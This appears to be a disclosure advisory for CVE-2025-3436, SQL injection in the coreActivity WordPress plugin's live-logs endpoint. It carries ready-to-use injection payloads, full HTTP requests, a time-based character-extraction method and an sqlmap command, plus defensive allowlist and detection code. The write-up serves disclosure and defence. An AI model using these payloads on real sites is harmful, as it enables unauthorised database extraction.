
CVE-2025-3436: Multiple SQL Injection in coreActivity Activity Logging plugin for WordPress - Report


Reference / Advisory Number : CVE-2025-3436

Description of the vulnerability

The coreActivity Activity Logging plugin for WordPress suffers from time-based and Boolean-based SQL injection vulnerabilities in the /wp-admin/admin-ajax.php?action=coreactivity_live_logs endpoint. The vulnerable parameter is the "args" parameter; the injection occurs in its "orderby" and "order" fields. More details can be found in the manual exploitation analysis below.

These vulnerabilities allow an authenticated attacker to manipulate the SQL queries built from these fields by injecting specially crafted SQL payloads, and to extract data from the underlying database.
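The root cause described above is that sort fields are concatenated into an ORDER BY clause, a position where prepared-statement parameters cannot be used. The following is an added illustration, not the plugin's code: the vulnerable pattern beside an allowlist-based replacement. The column names in LOG_COLUMNS are assumed, since the advisory does not list the plugin's real ones.

```python
# Assumed allowlist standing in for the plugin's real log-table columns.
LOG_COLUMNS = ("id", "logged", "user_id", "event_id", "ip", "method")
ALLOWED_ORDER = ("ASC", "DESC")


def vulnerable_order_clause(orderby: str, order: str) -> str:
    """The pattern the advisory describes: untrusted strings dropped straight
    into the ORDER BY clause, so '1 AND (SELECT ...)' or
    'DESC OR EXTRACTVALUE(...)' becomes part of the executed query."""
    return f"ORDER BY {orderby} {order}"


def safe_order_clause(orderby: str, order: str) -> str:
    """Allowlist-based replacement.

    ORDER BY takes identifiers and keywords, which cannot be bound as query
    parameters, so the input is never copied into SQL. It is only used to
    pick a known column (by name or 1-based position, as the plugin's own
    requests send "orderby":"1"); the direction is one of two fixed keywords.
    Anything else silently falls back to the default sort.
    """
    if orderby.isdigit() and 1 <= int(orderby) <= len(LOG_COLUMNS):
        column = LOG_COLUMNS[int(orderby) - 1]
    elif orderby in LOG_COLUMNS:
        column = orderby
    else:
        column = LOG_COLUMNS[0]  # unknown or malicious sort key: default
    direction = order.upper() if order.upper() in ALLOWED_ORDER else "DESC"
    return f"ORDER BY `{column}` {direction}"
```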

Burp Suite request (the Cookie header must be replaced with your own cookies from an authenticated session)

POST /wp-admin/admin-ajax.php?action=coreactivity_live_logs HTTP/1.1
Host: 10.0.1.124
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html, */*; q=0.01
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: http://10.0.1.124/wp-admin/admin.php?page=coreactivity-logs
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 638
Origin: http://10.0.1.124
Connection: keep-alive
Cookie: [Your cookies here]

args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filter-object_name":"","view":"","search":"","period":"","orderby":"1","order":"DESC","paged":0,"min_id":0},"limit":[],"filter":"coreactivity","settings":{"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column":[],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreactivity-logs"}

Steps to reproduce

  • Install the WordPress plugin: coreActivity Activity Logging plugin for WordPress

  • Set up a web proxy such as Burp Suite or Caido to intercept the web requests made by the web browser

  • Open the coreActivity section in the WordPress admin panel

  • In the web proxy's history, look for a POST request to the /wp-admin/admin-ajax.php?action=coreactivity_live_logs endpoint and send it to Repeater

Following the steps above, the request shows up in the Burp Proxy history

In Burp (or your proxy), replace the request parameters with the following ones to provoke an SQL error (shown here for the "order" field; the same works for the "orderby" field)

args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filter-object_name":"","view":"","search":"","period":"","orderby":"1","order":"DESC'","paged":0,"min_id":0},"limit":[],"filter":"coreactivity","settings":{"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column":[],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"10","nonce":"24a53b57aa","page":"coreactivity-logs"}

The response contains a MariaDB SQL error, which indicates a potential SQL injection

Note the following injectable JSON fields in the args parameter (each of them provokes an SQL error when a single quote "'" is injected):

  • orderby

  • order

Manual Exploit

  • field: orderby

In Burp (or your proxy), replace the request parameters with the following ones

args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filter-object_name":"","view":"","search":"","period":"","orderby":"1+AND+(SELECT+1598+FROM+(SELECT(SLEEP(5)))a)","order":"DESC","paged":0,"min_id":0},"limit":[],"filter":"coreactivity","settings":{"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column":[],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreactivity-logs"}

The "orderby" value is: 1+AND+(SELECT+1598+FROM+(SELECT(SLEEP(5)))a)

The response is then delayed by roughly 6 seconds

To demonstrate data extraction, we can use the following parameter:

args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filter-object_name":"","view":"","search":"","period":"","orderby":"1+AND+(SELECT+1598+FROM+(SELECT+IF(SUBSTRING(DATABASE(),1,1)='w',SLEEP(5),0))a)","order":"DESC","paged":0,"min_id":0},"limit":[],"filter":"coreactivity","settings":{"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column":[],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreactivity-logs"}

The response to the payload "1+AND+(SELECT+1598+FROM+(SELECT+IF(SUBSTRING(DATABASE(),1,1)='w',SLEEP(5),0))a)" injected in the orderby field is delayed, because "w" is the first character of the database name

Finally, we can extract the full database name "wordpress" using Burp Intruder with the Cluster bomb attack type and analyzing the response times

The following screenshot shows the sleep times; reading the delayed requests in order gives the database name "wordpress"

  • field: order "Boolean-Based SQL Injection"

For this field, I used the EXTRACTVALUE() function, which is typically used in XML path language expressions. It is used to trigger XML-related error messages that can expose data in an error-based SQL injection.

In our request, we change the "args" parameter with:

args={"lock":{"blog_id":-1},"atts":{"filter-blog_id":0,"filter-user_id":0,"filter-event_id":0,"filter-ip":"","filtercomponent":"","filter-country_code":"","filter-context":"","filter-method":"","filter-object_type":"","filterobject_id":0,"filter-object_name":"","view":"","search":"","period":"","orderby":"1","order":"-3196+OR+EXTRACTVALUE(3993,+CONCAT(0x3a,+(SELECT+DATABASE())))","paged":0,"min_id":0},"limit":[],"filter":"coreactivity","settings":{"_display_meta_column":false,"_logs_instance":"coreactivity","_filter_key":"coreactivity","_meta_column":[],"_rows_per_page_key":"coreactivity_logs_rows_per_page","_current_view":""},"id":"152","nonce":"f26596f318","page":"coreactivity-logs"}

The "order" field is: -3196+OR+EXTRACTVALUE(3993,+CONCAT(0x3a,+(SELECT+DATABASE())))

The following screenshot shows the extraction of the database name "wordpress"
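Both payloads above arrive inside the JSON "args" field of an ordinary-looking admin-ajax POST, so a WAF rule or log review that only looks at the URL will miss them. The following is an added detection example (not part of the advisory) that inspects the request body for this endpoint and flags any "orderby" or "order" value that is not a bare column name, position, or direction. The sample bodies are constructed and trimmed to the relevant fields; the payload strings are the ones shown on this page.

```python
import json
import re
from urllib.parse import unquote_plus

# Shape of a legitimate sort request: a bare column name or position and a
# plain direction. Anything else in these two fields deserves an alert.
SAFE_ORDERBY = re.compile(r"^[A-Za-z0-9_]{1,64}$")
SAFE_ORDER = re.compile(r"^(ASC|DESC)$", re.IGNORECASE)


def check_live_logs_body(body: str) -> list[str]:
    """Return findings for one coreactivity_live_logs request body.

    `body` is the raw application/x-www-form-urlencoded body as seen by a
    reverse proxy or WAF; only the `args` field is decoded and inspected.
    Each finding names the offending JSON field and its decoded value.
    """
    findings: list[str] = []
    if not body.startswith("args="):
        return findings
    try:
        args = json.loads(unquote_plus(body[len("args="):]))
    except (ValueError, TypeError):
        return ["args: not valid JSON"]
    atts = args.get("atts", {}) if isinstance(args, dict) else {}
    orderby = str(atts.get("orderby", ""))
    order = str(atts.get("order", ""))
    if not SAFE_ORDERBY.match(orderby):
        findings.append(f"orderby: {orderby!r}")
    if not SAFE_ORDER.match(order):
        findings.append(f"order: {order!r}")
    return findings


# Constructed sample bodies (form-encoded, '+' stands for a space).
BENIGN = 'args={"atts":{"orderby":"1","order":"DESC"},"nonce":"f26596f318"}'
TIME_BASED = ('args={"atts":{"orderby":"1+AND+(SELECT+1598+FROM+'
              '(SELECT(SLEEP(5)))a)","order":"DESC"}}')
ERROR_BASED = ('args={"atts":{"orderby":"1","order":"-3196+OR+EXTRACTVALUE'
               '(3993,+CONCAT(0x3a,+(SELECT+DATABASE())))"}}')

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("time-based", TIME_BASED),
                       ("error-based", ERROR_BASED)):
        print(name, check_live_logs_body(body) or "clean")
```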

Automatic Exploit using SQLMAP

sqlmap -r req1_log.txt --random-agent --risk 3 --level 5 --dbms=mariadb,mysql --dbs

Don't forget to mark the injection location with "*" in the saved request file.

Cheers — thanks for reading, and keep security first.